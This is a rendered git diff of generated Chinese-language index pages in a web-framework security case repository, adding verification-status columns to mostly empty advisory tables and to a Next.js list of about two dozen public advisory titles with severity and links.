| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/openmage/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/prestashop/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -26,6 +30,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/saleor/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/shopware/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/ecommerce/woocommerce/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -27,6 +31,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/angular/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/aspnet-core/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -24,6 +28,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/astro/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/django/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/echo/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -24,6 +28,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/esbuild/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/express/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/fastify/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/flask/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/gin/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -24,6 +28,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/hapi/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/koa/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/laravel/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:46+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

12
07-framework-security/frameworks/nestjs/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `0`
- 近 30 天新增/更新: `0`
- 重点 Markdown 案例数: `0`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `0`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -25,6 +29,6 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | - |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| No advisories yet | `n/a` | `empty` | `n/a` | `n/a` | `n/a` | `n/a` | - |

62
07-framework-security/frameworks/nextjs/INDEX.md
查看文件

@@ -8,7 +8,11 @@
- 总案例数: `26`
- 近 30 天新增/更新: `5`
- 重点 Markdown 案例数: `26`
- 最近渲染时间: `2026-03-17T04:37:52+00:00`
- 已实证(真实版本): `0`
- 已实证(synthetic): `0`
- 阻塞数: `0`
- 待人工/缺浏览器证据: `26`
- 最近渲染时间: `2026-03-17T06:28:45+00:00`
## 目标约束
@@ -26,31 +30,31 @@
## 案例列表
| 标题 | 严重度 | 状态 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|------|------------|----------|--------|
| Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components | `low` | `generated` | `official` | `2026-02-13T00:43:52.836085Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md) |
| Next.js has Unbounded Memory Consumption via PPR Resume Endpoint | `low` | `generated` | `official` | `2026-02-06T13:13:43.709252Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md) |
| Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration | `low` | `generated` | `official` | `2026-02-10T01:28:46.973023Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md) |
| Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up | `low` | `generated` | `official` | `2026-02-04T02:46:38.768104Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md) |
| Next Server Actions Source Code Exposure | `low` | `generated` | `official` | `2026-02-04T02:51:40.627151Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md) |
| Next Vulnerable to Denial of Service with Server Components | `low` | `generated` | `official` | `2026-02-04T03:55:54.855562Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md) |
| Next.js is vulnerable to RCE in React flight protocol | `low` | `generated` | `official` | `2026-02-04T03:45:15.823345Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md) |
| Next.js Affected by Cache Key Confusion for Image Optimization API Routes | `low` | `generated` | `official` | `2026-02-04T02:50:08.291668Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md) |
| Next.js Content Injection Vulnerability for Image Optimization | `low` | `generated` | `official` | `2026-02-04T04:35:34.538107Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md) |
| Next.js Improper Middleware Redirect Handling Leads to SSRF | `low` | `generated` | `official` | `2026-02-04T04:20:45.658010Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md) |
| Next.JS vulnerability can lead to DoS via cache poisoning | `low` | `generated` | `official` | `2025-07-03T21:49:52Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md) |
| Next.js has a Cache poisoning vulnerability due to omission of the Vary header | `low` | `generated` | `official` | `2026-02-04T02:37:18.974477Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md) |
| Information exposure in Next.js dev server due to lack of origin verification | `medium` | `generated` | `official` | `2025-06-13T14:41:21Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md) |
| Next.js Race Condition to Cache Poisoning | `low` | `generated` | `official` | `2025-09-26T17:48:29Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md) |
| Next.js may leak x-middleware-subrequest-id to external hosts | `medium` | `generated` | `official` | `2025-10-13T15:35:50Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md) |
| Authorization Bypass in Next.js Middleware | `low` | `generated` | `official` | `2026-03-04T15:06:29.993197Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md) |
| Next.js Allows a Denial of Service (DoS) with Server Actions | `low` | `generated` | `official` | `2026-02-04T04:36:04.252972Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md) |
| Next.js authorization bypass vulnerability | `low` | `generated` | `official` | `2025-09-10T21:12:24Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md) |
| Denial of Service condition in Next.js image optimization | `low` | `generated` | `official` | `2026-02-04T03:25:43.295558Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md) |
| Next.js Cache Poisoning | `low` | `generated` | `official` | `2026-02-04T03:45:33.402195Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md) |
| Next.js Server-Side Request Forgery in Server Actions | `low` | `generated` | `official` | `2026-02-04T03:32:36.434669Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md) |
| Unexpected server crash in Next.js. | `low` | `generated` | `official` | `2026-03-13T22:00:36.554552Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md) |
| XSS in Image Optimization API for Next.js | `low` | `generated` | `official` | `2026-03-13T22:00:20.154452Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md) |
| Open Redirect in Next.js | `low` | `generated` | `official` | `2026-03-13T22:00:08.038285Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-37699.md) |
| Open Redirect in Next.js versions | `low` | `generated` | `official` | `2026-03-13T22:14:13.665535Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md) |
| Directory Traversal in Next.js | `low` | `generated` | `official` | `2025-09-26T17:49:56Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-5284.md) |
| 标题 | 严重度 | 案例状态 | 实证状态 | 实证方式 | 来源置信度 | 更新时间 | 案例页 |
|------|--------|----------|----------|----------|------------|----------|--------|
| Next.js HTTP request deserialization can lead to DoS when using insecure React Server Components | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-13T00:43:52.836085Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-h25m-26qc-wcjf.md) |
| Next.js has Unbounded Memory Consumption via PPR Resume Endpoint | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-06T13:13:43.709252Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59472.md) |
| Next.js self-hosted applications vulnerable to DoS via Image Optimizer remotePatterns configuration | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-10T01:28:46.973023Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-59471.md) |
| Next has a Denial of Service with Server Components - Incomplete Fix Follow-Up | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:46:38.768104Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-5j59-xgg2-r9c4.md) |
| Next Server Actions Source Code Exposure | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:51:40.627151Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-w37m-7fhw-fmv9.md) |
| Next Vulnerable to Denial of Service with Server Components | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:55:54.855562Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-mwv6-3258-q52c.md) |
| Next.js is vulnerable to RCE in React flight protocol | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:45:15.823345Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-ghsa-9qr9-h5gf-34mp.md) |
| Next.js Affected by Cache Key Confusion for Image Optimization API Routes | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:50:08.291668Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md) |
| Next.js Content Injection Vulnerability for Image Optimization | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:35:34.538107Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md) |
| Next.js Improper Middleware Redirect Handling Leads to SSRF | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:20:45.658010Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57822.md) |
| Next.JS vulnerability can lead to DoS via cache poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-07-03T21:49:52Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md) |
| Next.js has a Cache poisoning vulnerability due to omission of the Vary header | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T02:37:18.974477Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49005.md) |
| Information exposure in Next.js dev server due to lack of origin verification | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-06-13T14:41:21Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-48068.md) |
| Next.js Race Condition to Cache Poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-26T17:48:29Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-32421.md) |
| Next.js may leak x-middleware-subrequest-id to external hosts | `medium` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-10-13T15:35:50Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-30218.md) |
| Authorization Bypass in Next.js Middleware | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-04T15:06:29.993197Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md) |
| Next.js Allows a Denial of Service (DoS) with Server Actions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T04:36:04.252972Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-56332.md) |
| Next.js authorization bypass vulnerability | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2025-09-10T21:12:24Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md) |
| Denial of Service condition in Next.js image optimization | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:25:43.295558Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-47831.md) |
| Next.js Cache Poisoning | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:45:33.402195Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-46982.md) |
| Next.js Server-Side Request Forgery in Server Actions | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-02-04T03:32:36.434669Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-34351.md) |
| Unexpected server crash in Next.js. | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:36.554552Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-43803.md) |
| XSS in Image Optimization API for Next.js | `low` | `generated` | `triage-manual` | `synthetic` | `official` | `2026-03-13T22:00:20.154452Z` | [link](/Users/x/websafe/07-framework-security/frameworks/nextjs/cases/nextjs-cve-2021-39178.md) |
